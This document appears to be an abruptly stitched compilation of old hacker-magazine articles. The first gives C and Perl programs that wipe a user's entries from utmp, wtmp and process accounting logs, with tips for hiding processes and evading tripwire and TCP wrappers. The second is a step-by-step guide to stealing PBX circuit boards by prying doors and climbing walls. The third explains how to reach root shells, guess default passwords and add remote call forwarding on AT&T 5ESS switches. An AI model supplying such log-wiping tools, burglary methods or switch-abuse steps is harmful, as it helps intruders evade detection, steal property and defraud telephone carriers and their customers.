messages on the console for the administrators? Beats me.
This article is about hiding your access--the little tricks of the trade
that keep you unnoticed and hidden from that evil bastard, the system
administrator.
Syslog(3), The "Big Daddy" of logging daemons, is the master of all system
accounting and log reporting. Most system components and applications
depend on syslogd to deliver the information (accounting, errors, etc.) to
the appropriate place. Syslog (syslogd) reads a configuration file
(/etc/syslog.conf) on startup to determine what facilities it will support.
Facilities: kern user mail daemon auth syslog lpr news uucp
Priorities: emerg alert crit err warning notice info debug
Facilities are the types of accounting that occur and priorities are the
level of urgency that the facilities will report. Most facilities are
divided and logged into separate accounting files. The common being daemon,
auth, syslog, and kern.
*.emerg;mail,daemon.crit
selects all facilities at the emerg level and the mail and daemon facil-
ities at the crit level.
*.debug;mail.none
kern,mark.debug /dev/console
*.notice;mail.info /usr/spool/adm/syslog
*.crit /usr/adm/critical
kern.err @phantom.com
*.emerg *
*.alert erikb,netw1z
*.alert;auth.warning ralph
logs all kernel messages and 20 minute marks onto the system
console, all notice (or higher) level messages and all mail system messages
except debug messages into the file /usr/spool/adm/syslog, and all critical
messages into /usr/adm/critical; kernel messages of error severity or
higher are forwarded to ucbarpa. All users will be informed of any
emergency messages, the users ``erikb'' and ``netw1z'' will be informed of
any alert messages, or any warning message (or higher) from the authorization
system.
There are there basic areas (files) in which system login information is
stored. These areas are:
/usr/etc/wtmp
/usr/etc/lastlog
/etc/utmp
The utmp file records information about who is currently using the
system. The file is a sequence of entries with the following structure
declared in the include file (/usr/include/utmp.h):
struct utmp {
char ut_line[8]; /* tty name */
char ut_name[8]; /* user id */
char ut_host[16]; /* host name, if remote */
long ut_time; /* time on */
};
This structure gives the name of the special file associated
with the user's terminal, the user's login name, and the
time of the login in the form of time(3C). This will vary from platform
to platform. Since Sun Microsystems ships SunOs with a world writable
/etc/utmp, you can easily take yourself out of any who listing.
The wtmp file records all logins and logouts. A null username
indicates a logout on the associated terminal. Furthermore, the terminal
name `~' indicates that the system was rebooted at the indicated time;
the adjacent pair of entries with terminal names `|' and `{' indicate the
system maintained time just before and just after a date command has
changed the system's idea of the time.
struct lastlog {
time_t ll_time;
char ll_line[8];
char ll_host[16];
};
The structure for lastlog is quite simple. One entry per UID, and it is
stored in UID order.
Creating a lastlog and wtmp editor is quite simple. Example programs are
appended at the end of this file.
Usually, if the accounting file is there with a 0 byte length then you can
rest assured that they are not keeping process accounting records. If they
are however, there are really only two methods of hiding yourself from this
form of accounting. One, you can suspend or stop process accounting (
which is usually done with the "accton" command) or you can edit the existing
process logfile and "wipe" your incriminating records.
struct acct
{
char ac_comm[10]; /* Accounting command name */
comp_t ac_utime; /* Accounting user time */
comp_t ac_stime; /* Accounting system time */
comp_t ac_etime; /* Accounting elapsed time */
time_t ac_btime; /* Beginning time */
uid_t ac_uid; /* Accounting user ID */
gid_t ac_gid; /* Accounting group ID */
short ac_mem; /* average memory usage */
comp_t ac_io; /* number of disk IO blocks */
dev_t ac_tty; /* control typewriter */
char ac_flag; /* Accounting flag */
};
Most sysadmins don't pay real attention to the process logs, since they
do tend to be rather large and grow fast. However, if they notice that a
break-in has occurred, this is one of the primary places they will look for
further evidence.
On the other hand, for normal system monitoring, you should be more worried
about your "active" processes that might show up in a process table listing
(such as ps or top).
Most platforms allow the general changing of the process name without having
any kind of privileges to do so. This is done with a simple program as noted
below:
#include <stdio.h>
#include <string.h>
strcpy(argv[0], "rn");
Basically, this program waits for a key-stroke and then exits. But,
while it's waiting, if you were to lookup the process it would show the name
as being "rn". You're just actually re-writing the argument list of the
spawned process. This is a good method of hiding your process or program
names ("crack", "hackit", "icmpnuker"). Its a good idea to use this method
in any "rogue" programs you might not want to be discovered by a system
administrator.
If you cant corrupt your process arguments, rename your program to something
that at least looks normal on the system. But, if you do this, make sure that
you don't run the command as "./sh" or "./ping" .. Even this looks suspicious.
Put your current path in front of your PATH environment variable and avoid
this mistake.
1.0. Background
================
Ok, so you know what tripwire does. Yup, it creates signatures for all
files listed in a tripwire configuration file. So, if you were to change
a file that is "tripwired", the proper authorities would be notified and your
changes could be recognized. Gee. That sounds great. But there are a
couple of problems with this.
The first step in beating tripwire is to know if the system you are on
is running it. This is trivial at best. The default location where
tripwire installs its databases are /usr/adm/tcheck or /usr/local/adm/tcheck.
You'll still be responsible for the changed inode times on the database.
But that's the risk you'll have to live with. Tripewire wont detect the change
since you updated the database. But an admin might notice the changed times.
Ta da. You got the access. uh-oh. What if they are running a TCP
wrapper? There are three basic ways they could be running a wrapper.
This is a sure sign that they are running Wietse Venema's tcp_wrapper.
Okay, by now you know whether or not they have a wrapper installed. If
so you will have to now decide what to do with the output of the wrapper.
You'll have to know where it put the information. The most common wrapper
used is tcp_wrapper. Here is another README excerpt detailing where the
actually output from the wraps are delivered.
8/usr/spool/mqueue/syslog
mail.debug /var/log/syslog
causes all messages of class mail with priority debug (or more urgent)
to be appended to the /var/log/syslog file.
Usually just editing the output and hoping the sysadmin didnt catch the
the wrap will do the trick since nothing is output to the console
(hopefully).
# Example programs
The following are short and sweet programs that give you the ability
to edit some of the more common logfiles found on most platforms. Most
of these are pretty simple to compile, although some might need minor
porting and OS consideration changes in structures and configurations.
#include <utmp.h>
#include <stdio.h>
#include <sys/file.h>
#include <sys/fcntlcom.h>
void usage(name)
char *name;
{
printf(stdout, "Usage: %s [ user ] or [ tty ]\n", name);
exit(1);
}
main(argc,argv)
int argc;
char **argv;
{
int fd;
struct utmp utmp;
int size;
int match, tty = 0;
if (argc!=2)
usage(argv[0]);
if ( !strncmp(argv[1],"tty",3) )
tty++;
fd = open("/etc/utmp",O_RDWR);
if (fd >= 0)
{
size = read(fd, &utmp, sizeof(struct utmp));
while ( size == sizeof(struct utmp) )
{
if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) :
( !strcmp(utmp.ut_name, argv[1]) ) )
{
lseek( fd, -sizeof(struct utmp), L_INCR );
bzero( &utmp, sizeof(struct utmp) );
write( fd, &utmp, sizeof(struct utmp) );
}
size = read( fd, &utmp, sizeof(struct utmp) );
}
}
close(fd);
}
#include <utmp.h>
#include <stdio.h>
#include <sys/file.h>
#include <sys/fcntlcom.h>
void usage(name)
char *name;
{
printf("Usage: %s [ user | tty ]\n", name);
exit(1);
}
if (argc>3 || argc<2)
usage(argv[0]);
if (strlen(argv[1])<2) {
printf("Error: Length of user\n");
exit(1);
}
if (argc==3)
if (argv[2][0] == 'l') lastone = 1;
if (!strncmp(argv[1],"tty",3))
tty++;
if ((fd = open("/usr/adm/wtmp",O_RDWR))==-1) {
printf("Error: Open on /usr/adm/wtmp\n");
exit(1);
}
if (fd >= 0)
{
size = read(fd, &utmp, sizeof(struct utmp));
while ( size == sizeof(struct utmp) )
{
if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) :
( !strncmp(utmp.ut_name, argv[1], strlen(argv[1])) ) &&
lastone != 1)
{
if (x==10)
printf("\b%d", x);
else
if (x>9 && x!=10)
printf("\b\b%d", x);
else
printf("\b%d", x);
lseek( fd, -sizeof(struct utmp), L_INCR );
bzero( &utmp, sizeof(struct utmp) );
write( fd, &utmp, sizeof(struct utmp) );
x++;
}
size = read( fd, &utmp, sizeof(struct utmp) );
}
}
if (!x)
printf("No entries found.");
else
printf(" entries removed.");
printf("\n");
close(fd);
}
#!/perl
package LCE;
#------------------------------------------------------------------------------
# begin getopts.pl
sub Getopts {
local($argumentative)=@_;
local(@args,$_,$first,$rest,$errs);
local($[)=0;
# end getopts.pl
#------------------------------------------------------------------------------
sub Initialize {
select(STDOUT); $|++;
close(I);
open(I,'(cd /dev; echo tty*)|');
$ttys=<I>;
close(I);
@ttys = split(/ /,$ttys);
for $tty (@ttys) {
($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size,
$atime,$mtime,$ctime,$blksize,$blocks) = stat("/dev/$tty");
$TTY{"$rdev"} = "$tty";
}
$TTY{'65535'} = 'NoTTY';
#------------------------------------------------------------------------------
sub LCE {
&Initialize();
open(I,"<$acct");
close(O);
open(O,">$outf");
$template='CCSSSLSSSSSSA8';
while (read(I,$buff,32)) {
($c1,$c2,$u,$g,$d,$bt,$ut,$st,$et,$o4,$o5,$o6,$c3) =
unpack($template,$buff);
($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) =
localtime($bt);
$mon++;
$mon = "0$mon" if ($mon < 10);
$mday = "0$mday" if ($mday < 10);
$hour = "0$hour" if ($hour < 10);
$min = "0$min" if ($min < 10);
$sec = "0$sec" if ($sec < 10);
$tt = localtime($bt);
$flags='';
if ($c1 & 0001) { $flags .= 'F'; }
if ($c1 & 0002) { $flags .= 'S'; }
if ($c1 & 0004) { $flags .= 'P'; }
if ($c1 & 0010) { $flags .= 'C'; }
if ($c1 & 0020) { $flags .= 'K'; }
if ($c1 & 0300) { $flags .= 'A'; }
$c3 =~ s/\000.*$//;
print STDOUT "$c3 $flags $PASSWD{$u}/$GROUP{$g} $TTY{$d}";
print STDOUT " $DAY{$wday} $hour:$min:$sec";
if ($PASSWD{$u} eq $user) {
print " [ERASED] ";
} else {
print O pack($template,$c1,$c2,$u,$g,$d,$bt,$ut,$st,$et,$o4,$o5,$o6,$c3);
}
print "\n";
}
close(O);
}
#------------------------------------------------------------------------------
&LCE();
#struct acct
# {
# char ac_flag; /* Accounting flag */
# char ac_stat; /* Exit status */
# uid_t ac_uid; /* Accounting user ID */
# gid_t ac_gid; /* Accounting group ID */
# dev_t ac_tty; /* control typewriter */
# time_t ac_btime; /* Beginning time */
# comp_t ac_utime; /* Accounting user time */
# comp_t ac_stime; /* Accounting system time */
# comp_t ac_etime; /* Accounting elapsed time */
# comp_t ac_mem; /* average memory usage */
# comp_t ac_io; /* chars transferred */
# comp_t ac_rw; /* blocks read or written */
# char ac_comm[8]; /* Accounting command name */
# };
#
# #define AFORK 0001 /* has executed fork, but no exec */
# #define ASU 0002 /* used super-user privileges */
# #define ACOMPAT 0004 /* used compatibility mode */
# #define ACORE 0010 /* dumped core */
# #define AXSIG 0020 /* killed by a signal */
# #define ACCTF 0300 /* record type: 00 = acct */
Watch for my next article on 50 great system patches that will keep
your access just the way it is .. illegal. Yaawhoo.
# End of article
==Phrack Magazine==
A DSR Tutorial by :
***************************************************************************
BACKGROUND
~~~~~~~~~~
The theft of PBX circuit boards is a novel idea and seldom heard
of, but -- as made apparent above -- it does occur. In the used PBX
scene, often referred to as the "secondary" or "grey" market, there is
always a demand for circuit packs from a wide variety of PBXs. The
secondhand PBX industry grew from $285 million in 1990 to $469 million
in 1992 -- despite the recession.
The essence of any PBX is a rack or multiple racks of circuit
cards/boards/packs, with an average grey market value of anywhere from
$50 to $2000 each. The cards are lightweight, small in size, and can
even withstand a moderate dose of abuse. Transport of misappropriated
circuit boards is done without risk -- under and police scrutiny, a box
of these looks like a mere pile of junk (or senior engineering project)
in the trunk of your car. Furthermore, the serial numbers on the boards
are seldom, if ever, kept track of individually, and these can be
removed or "replaced" in any case. Unlike computer equipment or
peripherals, PBX cards are extremely safe, simple, and non-proprietary
components to handle -- even in quantity.
Although you may wish to physically access PBXs for reasons other
than theft, it will be assumed here that monetary gain is your motive.
In either case, this introductory file makes it clear that access can be
achieved with varying levels of ease. A PBX theft should be thought of
in terms of two phases: reconnaissance and extraction. Recon involves
finding and selecting prime targets. Extraction is the actual theft of
the system. Both phases can be completed through "office building
hacking," a wide variety of deception, breaking and entering, social
engineering, and technical skills.
Phase I : Reconnaissance
-- Users groups and newsletters. Some of the extremely large PBX owners
join users groups. Though this is abstract, owners will discuss their
systems openly at the meetings. Newsletters are mailed out to members,
often discussing special applications of specific locations in detail.
Great for making sales contacts.
Phase II : Extraction
-- Use of tools. You can easily get around almost any office building
using only screwdrivers. With practice, prying doors will be quick and
silent. Although some doors have pry-guards or dead-bolts, about every
other phone closet you'll encounter can be opened with a screwdriver.
Before forcing the gap between door and frame, try sliding back the
locking mechanism. For best results, work it both ways with a pair of
screwdrivers; a short one for leverage, a longer one for manipulation.
For dead-bolts, a pipe wrench (a wrench with parallel grips) can
turn the entire lock 90 degrees. Interior doors are cheaply
constructed; if you can wrench the lock, it'll turn and the bolt will be
pulled back into the door. Quality dead-bolts have an inclined exterior
to prevent it from being gripped. For these, diamond-cutting string can
be applied. This is available at select plumbing supply houses for $150
upwards.
-- Ceilings and adjacent offices. Not only are the doors cheap inside
office buildings, so are the walls. If you're having trouble with a
door or lock, push up a ceiling tile with your screwdriver and see if
the wall stops or is continuous. If it stops, you may choose to climb
over. If you're already inside an office and find a particular room
locked, climbing is always an option because walls are never continuous
between rooms. Walls are seldom continuous between business either; if
you can't get into a particular office space, try through adjacent
space.
Operation Integrity
***************************************************************************#
==Phrack Magazine==
% % % % % % % % % % % % % % % % % % %
% % % % % % % % % % % % % % % % % % % %
% % % %
% AT$T 5ESS(tm) %
% % From Top to Bottom % %
% %
% % % %
% by: Firm G.R.A.S.P. %
% % % %
% % % % % % % % % % % % % % % % % % % %
% % % % % % % % % % % % % % % % % % %
Introduction
~~~~~~~~~~~~
The 5ESS is a switch. The first No. 5ESS in service was cut over in Seneca,
Illinois (815) in the early 1982. This test ran into a few problem, but all
and all was a success. The 5ESS is a digital switching system, this
advantage was realized in No. 4 ESS in 1976. The 5ESS network is a TST
(Time Space Time) topology, the TSIs (Time Slot Interchangers) each
have their own processor, this makes the 5ESS one of the faster switches.
Though I hear some ATM switches are getting up there.
^ ^ ^
| | |
| | |
......|.|....|......
: v v v :
: ------------- :
: | | :
: | Input | :
........................... : | Output |====== TTY/CRT
----------- : : : | Processor | :
| Switch |<=========== : : ------------- :
| Module |<========] | : : ^ ..............
----------- : v v : : | :
o : ======= ---------- : : | ------------ :
o : | TMS |<->|Message | : : | | Main | :
o : | |<->|Switch |<============ | | Store | :
----------- : ======= ---------- : : | | -----.------ :
| Switch | : ^ ^ : : | | | :
| Module |<========= | : : v v | :
-----------<=========== : : -------------- | :
:.........................: : | 3B |======= :
: | Central | :
: | Control |<=====> Disk! :
: -------------- :
: :
................................:
ADMINISTRATIVE MODULE
COMMUNICATIONS MODULE
- Provides for control message transfer between the 3B20D Processor and
Interface Modules (IM's)
- Contains the clock for synchronizing the network.
--------------
| |
| SMPU |
|------------|
--------- | |
| | (64) | |
Analog Sub Lines <---->| LU |<-------->| |
|-------| | |
| | (64) | |
Analog Trunk Lines <-->| TU |<-------->| | (256)
|-------| | TSIU |<--------> NCT
| | | | Links
| | (128) | 512 | to
SLC-96 Remote <------->| DCLU |<-------->| Time |<--------> TMS
| | | Slots |
|-------| | |
| | | |
| | | |
| | | |
| | (256) | |
T1 Lines <---------->| DLTU |<-------->| |
| | | |
| | | |
| | |------------|
--------- | |
| DSU |
--------------
- Local DSU provides high usage service circuits, such as tone decoders
and generators, for lines and trunks terminated on the SM.
- Global DSU provides low usage service circuits, such as 3-port
conference circuits and the Transmission Test Facility, for all lines
and trunks in the office (requires 64 time slots).
The SM may be equipped with any combination of LU's, TU's, DCLU's and DLTU's
totaling 512 time slots.
Test Channel
~~~~~~~~~~~~
The TEST channel is where one can test lines, and test the switch itself.
This is where operating support systems (such as LMOS) operate from.
This channel allows one to monitor lines via the number test trunk aka
adding a third trunk), voltage test and line seizure.
Here is a list of OSSs which access the test channels on the 5ESS.
SCC Channel
~~~~~~~~~~~
The SCC channel is where the SCC looks and watches the switch 24 hours a day,
seven days a week! From this channel one can input RC messages if necessary.
A lot of people have scanned these out, and though they were AMATs. Well this
is in short, WRONG! Here is a sample buffering of what they are finding.
-----------------------------------------------------------------------------
------------------------------------------------------------------------------
This has nothing to do with AMA, this is switch output on say the SCC
channel. This is used by the SCCS for logging, and monitoring of alarms.
The whole point of this channel is to make sure the switch is doing what it
should do, and to log all activity on the switch. NOTHING MORE!
To go into these messages and say what they are would take far too long,
order the OM manuals for the 5ESS, watch out, they are about 5 times the size of
the IM (input manual) set. On average it takes someone three years of training
to be able to understand all this stuff, there is no way anyone can write a
little file in Phrack and hope all who read it understand everything about the
5ESS. RTFM!
RC Channel
~~~~~~~~~~
The RC/V (Recent Change/Verify) Channel is where new features can be added or
taken
away from phone lines. This is the main channel you may come in contact with,
if you come in contact with any at all. When one connects to a 5ESS RC/V channel
one may be dumped to a CRAFT
shell if the login has not been activated. Access to the switch when the
login is active is controlled by lognames and passwords to restrict
unwanted entry to the system. In addition, the SCC (Switching Control
Center) sets permission modes in the 5ESS switch which control the RC
(recent change) security function.
The RC security function determines whether recent changes may be made
and what types of changes are allowed. If a situation arises where the RC
security function denies the user access to recent change via RMAS or RC
channels, the SCC must be contacted so that the permission modes can be
modified. (Hint Hint)
The RC security function enables the operating telephone company
to decide which of its terminals are to be allowed access to which
set of RC abilities. NOTE that all verify input messages are always
allowed and cannot be restricted, which does not help too much.
The RC security data is not part of the ODD (office dependent data).
Instead, the RC security data is stored in relatively safe DMERT operating
system files which are only modifiable using the following message:
SET:RCACCESS,TTY="aaaaa",ACCESS=H'bbbbb;
NOTE: Order IM-5D000-01 (5ESS input manual) or OM-5D000-01 (5ESS output manual)
for more information on this and other messages from the CIC at 1-800-432-6600.
You have the money, they have the manuals, do not ask, just order. I
think they take AMEX!
When the message is typed in, a DMERT operating system file is created
for a particular terminal. The content of these files, one for each terminal,
is a binary field with each bit position representing a unique set of RC
abilities. Conversion of this hexadecimal field to binary is accomplished
by converting each hexadecimal character to its equivalent
4-bit binary string.
----------------------------------------------------------
HEX BINARY | HEX BINARY | HEX BINARY | HEX BINARY
-------------|--------------|--------------|--------------
0 0000 | 4 0100 | 8 1000 | C 1100
-------------|--------------|--------------|--------------
1 0001 | 5 0101 | 9 1001 | D 1101
-------------|--------------|--------------|--------------
2 0010 | 6 0110 | A 1010 | E 1110
-------------|--------------|--------------|--------------
3 0011 | 7 0111 | B 1011 | F 1111
----------------------------------------------------------
OP:RCACCESS,TTY="xxxxx";
GRC:PASSWORD,CLERKID=xxxxxxxxxx,[PASSWD=xxxxxxxx|DELETE]
This input message can only be executed from the MCC or SCCS
terminals, and only one password is allowed per CLERK-ID. To
change a clerk-id's password, this message is used with the same
CLERK-ID but with a different password.
Global RC Schedule View 28.1 from the RC/V Recent Change Menu System
----------------------------------------------------------------------------
----------------------------------------------------------------------------
When the security is set up on the RC/V channel, one will see:
----------------------------------------------------------------------------
5ESS login
Account name:
----------------------------------------------------------------------------
There are no defaults, since the CLERK-ID and the password are set by craft,
but common password would be the name of the town, CLLI, MANAGER, SYSTEM,
5ESS, SCCS1, SCC, RCMAC, RCMAxx, etc,...
If one sees just a " < " prompt you are at the 'craft' shell
of the RC/V channel, the 5E login has not been set. The Craft shell is
running on the DMERT (which is a UNIX environment development operating system,
a System V hack). The Craft shell prompt is a "<". From this shell one
will see several error messages. Here is a list and what they mean:
OK Good
PF Printout follows
RL Retry later
NG No good, typically hardware failure
(ie: SM does not exist)
IP In progress
NA The message was not received by the backup control
process
The DMERT (Duplex Multiple Environment Real Time) uses the Western
Electric (another name for AT$T!) 3B20D Duplex processor (or 2 3B20S
Simplex processors). The DMERT software totals nearly nine thousand
source files, one million lines of non-blank source code,
and was developed by approximately 200 programers. There are eight main
releases of this software, they are referred to as generics (like 5E4.1,
5E4.2, to 5E8.1 also seen as 5E4(1), 5E4(2) to 5E8(1), this can be though
of as DOS version). DMERT is similar to regular UNIX but can be best described
as a custom UNIX system based on the 3B20D, the DMERT OS can be ported to
PDP-11/70s or a large IBM Mainframe. The DMERT operating system is split both
logically and physically. Physically, the software is evenly divided across
the five (there were seven Software Development systems all running a 3B20S
where the DMERT code was written) Software Development systems. Logical, the
software is divided into twenty-four different subsystems. To access this
from the "craft" shell of the RC/V channel, type:
RCV:MENU:SH!
NOTE:
This will dump one to a root shell, from which VaxBuster's (Who knows nothing
about VAXen, always wondered about him) file on how to redirect a TTY may
come in useful.
When programing the 5ESS there are things one should know, the first is that
one has a lot of power (just keep 911 in mind, it would be foolish to even
think of disrupting anyones service. 911 is there for a reason, it should STAY
that way). And anything one does is logged, and can be watched from the
SCC. Note that the night SCC crew is a lot more lax on how things are done
then the day shift, so it would be best to do this at night. I could tell you
how to crash the switch in two seconds, but that is not the point here.
Destroying something is easy, anyone can do that, there is no point to it.
All that taking down a switch will do is get one into jail, and get sued if
someone needed 911 etc,... (I think SRI is wishing they had talked to me
now).
RC and VFY is complex from the craft shell on the RC/V channel.
This is called the input text option. It is accessed by using the
RCV:APPTEXT:
DATA - This is for more then one RC operation in the same command
SUMMARY - Turns on one line summaries on the read only printer (ROP) (DEFULT)
NSUMMARY - Turns off one line summary logging by the ROP
VFYIMMED - Prints out verifies (VFYs) immediately, does not wait for
session end.
VFYEND - Prints out all VFYs at session end, this is the DEFULT.
rcv:apptext:data,form=2v1&vfy,set="oe.entype"&lset="oe.len"&xxxxxxxx,pty=i,vfy!
The 2V1 may look strange at first, it may help getting use to the basics
first. To just VFY telephone numbers, just do a:
RCV:APPTEXT:DATA,FORM=1V6-VFY,TN=5551212,VFY,END!
Though I can not really explain this any more then I have just due to
time and space. These input messages may look complex at first, but are
really simple, and much better then dealing with the menu system, but
you will need to learn RC yourself! No one can explain it to you.
OP:AMA:SESSION[,ST1|,ST2];
This command will request a report of the current or most recent automatic
message accounting (AMA) tape. ST1 and ST2 are the data streams.
One may want to pull up all the out of service lines, trunks, or
trunk groups for many reasons. These reasons i will not go into, but
from which lines can be set up. The command to do this from the craft
shell is a PDS command, this command is with a 'ball bat' (a `` ! '').
OP:LIST,LINES[,FULL][,PRINT][;[a][,b][,c][,d][,e]]!
OP:LIST,TRUNKS[,FULL][,PRINT][;[a][,b][,c][,d][,e]]!
OP:LIST,TG [,FULL][,PRINT][;[a][,b][,c][,d][,e]]!
FULL - All (primary and pending) are printed. Note FULL is not the
default when inputing this command.
a-e - This is port status to match against the subset of trunks, lines
or trunk groups that are specified. (This is required input
for FULL)
To access this shell from the RC/V channel craft shell, type:
RCV:MENU:APPRC
To access the 5ESS RC/V menu system from the MCC, STLWS, and TLWS
channel/terminals, one uses what are called pokes. The poke that
is used here to access the RC/V Menu system on the 5ESS is 196.
Type 196 at the `` CMD< '' prompt, and you are on the RC/V menu system
of the 5ESS switch. This will cause ``RC/V 196 STARTING'' and
``RC/V 196 COMPLETED'' to be printed out on the ROP.
Either way, this will toss you into a menu system. The main menu looks like
this:
------------------------------------------------------------------------------
Menu Commands:
------------------------------------------------------------------------------
The help menus for the 5ESS switch are lame, but I though that it would
be good to show them to you just for the hell of it, because it does explain
a little about the switch.
------------------------------------------------------------------------------
---------------------------------------------------
SCREEN 2 OF 7 5ESS SWITCH
RECENT CHANGE VIEW H.1
COMMANDS FOR MENU PAGES
------------------------------------------------
BMI - Delayed Activation Mode. Choose time or demand release (for time
release add service information). Select view number for Recent Change.
BMD - Display Status of Delayed Activation Recent Changes.
BMR - Release a file of Recent Changes stored for Delayed Activation.
IM - Immediate Release Mode.
________________________________________________
< - In first field: Leave this view and return to select view number.
< - Not in first field: Return to first field.
^ - In first field: Select new operation for this view.
^ - Not in first field: Return to previous field.
> or ; - Go to end of view or stop at next required field.
* - Execute the operation or go to next required field.
? - Toggle help messages on and off.
Q - Abort this view and start over.
V - Validate input for errors or warnings.
________________________________________________
R -
Review view from Data Base.
I -
Insert this view into Data Base.
U -
Update this view into Data Base.
D -
Delete this view from Data Base (only print Key fields).
C -
CHANGE: Change a field - All fields may be changed except key fields
when in the update mode only.
C - CHANGE-INSERT: Allowed in the review mode only - Allows you to review
C - CHANGE-INSERT: Allowed in the review mode only - Allows you to review
a view and then insert a new view with similar field. You must change
the key fields to use this facility. You may change other fields as
required by the new view.
P - Print hard copy of screen image (must have RC/V printer attached).
________________________________________________
________________________________________________
-----------------------------------------------------------------------------
------------------------------------------------------------------------------
When using the RC/V menu system of the 5ESS, you may go and just keep going into
sub-menus, and fall off the end of the Earth. Here are the navigational
commands that are used to move around the menu system. As seen from the
RC/V menu system help, you see "SCREEN X out of X." This means that there are
so many screens to go and to move between the screens you use the `` < '' to
move back (toward main menu) and `` > '' to move to the last menu. I know it
is shown in the help menu, but it is not explained like it needs to be.
Batch Input
~~~~~~~~~~~
The Batch Input feature for the 5ESS switch allows recent changes (RC)
to be entered at any date and time when the RC update would be
performed. This allows RC input to be entered quickly, and for a large
number of inputs. The large numbers of RC input can be released
quickly in batch mode. The RC input can then be entered at any time,
stored until needed, and then released for use by the system
whenever needed, at any specific date and/or time.
First and second level error correction is done during batch input.
There are several different modes of batch input. These are:
Entering BMI (Batch Mode Input), one types `` BMI '' at the RC/V
menu prompt. Once entering, you will be prompted with whether
the input is DEMAND (demand) or TIMEREL (Time Release). DEMAND
input allows one to manual have the batch update the database,
TIMEREL is automatic. TIMEREL has one enter a time and date.
When using DEMAND, you will be prompted for the file name. The
file will be in `` /rclog '' in the DMERT OS.
In TIMEREL, you will be prompted with the CLERK-ID, which in this
case is the file name for the file in the `` /rclog ''. Then
for VERBOSE options, the RC SRVOR (Recent Change Service Order)
is displayed on the screen.
5ESS SWITCH
RECENT CHANGE B.1
SERVICE ORDER NUMBER VIEW
-----------------------------------------------------------------------------
BMD is a "mask" of RC/V done from the RC/V channel craft shell, by using the
REPT:RCHIST or a pseudo menu system. All transactions are displayed on the ROP,
though the data could also be sent to a file in the `` /rclog '' in DMERT.
The Pseudo menu system looks like:
----------------------------------------------------------------------------
1. Summary of clerk activity
3. Activity by clerk ID
----------------------------------------------------------------------------
REPT:RCHIST - BMD
The REPT:RCHIST BMD (Text) command is done from the RC/V channel craft
shell. The command synopsis is:
REPT:RCHIST,CLERK=[,FORMAT={SUMMARY|DETAIL}]{[,ALL]|[,PENDING][,COMPLETE]
[,ERROR][,DEMAND]}[,DEST=FILENAME][,TIME=XXXXXXXXXX];
REPT:RCHIST,CLERK=a[,FORMAT={SUMMARY|DETAIL}] {,ALL|,b}[,DEST={c|FILE}]
[,TIME=XXXXXXXXXX];
This is the manual release (updating) of the 5ESS database. This is done
from the RC/V channel craft shell. The command that is used is the EXC:RCRLS
input message. There is no real need to go into this message.
Adding RCF (Remote Call Forward) on a 5ESS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. At the "MENU COMMANDS" commands prompt of the 5ESS main menu in the
RC/V APPRC menu system of the 5ESS, enter '12' for the "BRCS FEATURE
DEFINITION". Then access screen '1.11', this is the BRCS screen. When it
asks you to 'ENTER DATABASE OPERATION' enter "U" for Update and hit
return.
NOTE: When at menu '12,' you will NOT see '1.11' listed in the menu
options. By just accessing menu '1' you will not be able to add features.
This is a problem with the 5ESS menu system.
------------------------------------------------------------------------------
-------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
I - to insert a form
C - to change a field on a form
V - to validate the form
A - to display the desired screen number
P - to print the current screen
U - to update the form
Enter `` C '' to change, access filed 11 and row 1 (goto the /CFV
wherever it may be) or add /CFR if it is not there. If it does though,
leave the "A" (Active) field "N" (Yes or No). Change the P (Presentation)
column to "U" (Update). Then Hit Return.
NOTE: Different Generics have other fields, one of them being a AC (Access
Code) field. This field is a logical field, that mean only accepts a
"Y" for yes and "N" for no. Also when adding the feature to the switch,
the row and field numbers may not be shown, but will always follow this
pattern. Also note that the /CFV (Call forwarding variable) feature may not
be there, there maybe no features on the line. These examples are from
Generic 4 (2). Here is a example of 5E8 (which is not used too many places,
but this is what menu 1.11 in the BRCS Feature Definition looks like:
-------------------------------------------------------------------------------
5ESS SWITCH
SCREEN 1 OF 2 RECENT CHANGE 1.11
(5112,5113)BRCS FEATURE ASSIGNMENT (LINE)
-------------------------------------------------------------------------------
Hit Return twice to get back to "ENTER UPDATE, CHANGE, SCREEN #, OR PRINT:".
Enter a "U" for update and hit Return. It will say "FORM UPDATE".
------------------------------------------------------------------------------
----------------------------------------------------------------------
5ESS SWITCH WCDS0
RECENT CHANGE 1.22
CALL FORWARDING (LINE PARAMETERS)
*1. TN 5551212
*6. FEATURE CFR
9. FWDTODN ______________________________
10. BILLAFTX 0 16. SIMINTER 99
11. TIMEOUT 0 17. SIMINTRA 99
12. BSTNINTVL 0 18. CFMAX 32
13. CPTNINTVL 0 19. BSRING N
-------------------------------------------------------------------------------
4. If you used the automatic forms presentation, it will have the telephone
number already on LINE1. If not retype the telephone number you want
forwarded. The bottom of the screen will say "ENTER UPDATE, CHANGE, VALIDATE
OR PRINT:", type "C" for change and hit return.
5. When it says CHANGE FIELD type "9" and enter your forward to DN (Destination
Number) including NPA if necessary. This will put you back to the "CHANGE
FIELD" prompt. Hit return again for the "ENTER UPDATE, CHANGE, VALIDATE OR
PRINT:". Hit "U" for Update form and wait for "FORM UPDATED".
6. Lastly, access screen 1.12, BRCS FEATURE ACTIVATION (LINE ASSIGNMENT). At the
prompt enter a "U" for Update, and on ROW 11 Line 1 (or wherever), change
the "N" in column "A" to a "Y" for Yes, and you are done.
To add other features onto a line, follow the same format for adding the
/CFR, but you may not need to access 1.22. Some other features are:
/LIDLXA - CLID
/CFR - Remote Call Forward
/CWC1 - Call Waiting
/CFBLIO - call forward busy line i/o
/CFDAIO - call forward don't answer i/o
/CFV - call forwarding variable
/CPUO - call pick up o !used in the selq1 field!
/CPUT - call pick up t !used in the tpredq field!
/CWC1D - Premiere call waiting
/DRIC - Dist. ring
/IDCT10 - Inter room ID
/IDCTX2 - 1digit SC
/IDCTX2 - Interoom ID 2
/IDCTX2 - Premiere 7/30, convenience dialing
/IDCTX3 - Premiere 7/30, no cd
/IDMVP1 - Premiere 2/6, no convenience dialing
/IDMVP2 - Premiere 2/6, CD, not control sta.
/IDMVP3 - Premiere 2/6, CD, control station
/MWCH1 - Call hold
/MWCTIA2 - Call transfer 2
/TGUUT - Terminal group ID number with TG view (1.29).
Though, I have always wondered how to set one up myself in a safe way.
One way nice way to get ANI/F through a 5ESS to use a inhibit command.
